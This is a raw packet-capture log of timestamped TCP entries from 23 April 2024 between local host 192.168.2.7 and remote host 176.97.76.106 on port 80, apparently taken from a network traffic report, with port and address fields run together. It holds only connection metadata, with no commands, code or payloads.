                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109340906 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109344006 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109353065 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109365940 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109366894 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109378099 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109379053 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109395981 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109410048 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109422922 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109424114 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109450102 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109452009 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109463930 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109477043 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109483957 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109493017 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109504938 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109505892 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109517097 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109528065 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109541893 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109555006 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109555960 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109568119 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109572887 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109580994 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109591961 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109596968 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109603882 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109616995 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109618902 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109632969 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109637022 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109651089 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109663963 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109678984 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109690905 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109703064 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109714985 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109726906 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109741926 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109754086 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109754086 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109765053 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109771013 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109776974 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109802961 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109852076 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.109997988 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110012054 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110023022 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110034943 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110053062 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110055923 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110064983 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110076904 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110089064 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110094070 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110100985 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110116959 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110129118 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110130072 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110141993 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110142946 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110150099 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110156059 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110168934 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110179901 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110193014 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110193968 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110204935 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110205889 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110219002 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110230923 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110233068 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110243082 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110255957 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110268116 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110280991 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110285044 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110297918 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110308886 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110316038 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110316038 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110321999 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110333920 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110347986 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110348940 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110359907 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110373020 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110384941 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110397100 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110399961 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110409975 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110413074 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110423088 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110424995 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110435009 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110449076 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110457897 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110465050 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110485077 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110488892 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110502958 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110508919 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110516071 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110519886 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110527992 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110538960 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110551119 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110563040 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110563993 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110574961 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110575914 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110584974 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110596895 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110600948 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110609055 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110622883 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110622883 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110637903 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110637903 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110650063 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110661983 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110675097 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110677004 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110686064 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110697985 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110699892 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110709906 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110718012 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110723019 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110734940 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110735893 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110742092 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110748053 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110755920 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110766888 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110779047 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110781908 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110790014 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110801935 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110805988 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110814095 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110819101 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110825062 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110836983 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110851049 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110862970 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.110876083 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.111133099 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.287713051 CEST8049703185.172.128.76192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341278076 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341294050 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341308117 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341320038 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341331005 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341344118 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341413975 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341456890 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341470957 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341489077 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341546059 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341567993 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341656923 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341670036 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341685057 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341696978 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341705084 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341710091 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341721058 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341737032 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341738939 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341752052 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341763973 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341768026 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341775894 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341788054 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341790915 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341799974 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341811895 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341814995 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341825962 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341933966 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.341950893 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342009068 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342025042 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342058897 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342093945 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342106104 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342108965 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342156887 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342156887 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342506886 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342577934 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342592001 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342603922 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342617035 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342636108 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342636108 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342665911 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342726946 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342756033 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342767954 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342782021 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342794895 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342808008 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342822075 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342833996 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342844963 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342852116 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342856884 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342871904 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342871904 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342885017 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342889071 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342900038 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342912912 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342925072 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342937946 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342950106 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342967987 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342981100 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.342992067 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343019009 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343070984 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343085051 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343096018 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343097925 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343111992 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343125105 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343126059 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343137980 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343139887 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343148947 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343163013 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343164921 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343174934 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343187094 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343198061 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343199968 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343209982 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343223095 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343234062 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343234062 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343246937 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343247890 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343261003 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343261957 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343276024 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343291044 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343303919 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343306065 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343317986 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343323946 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343329906 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343342066 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343353987 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343362093 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343365908 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343378067 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343379974 CEST4970280192.168.2.7176.97.76.106
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343389988 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343401909 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343413115 CEST8049702176.97.76.106192.168.2.7
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.343425989 CEST8049702176.97.76.106192.168.2.7
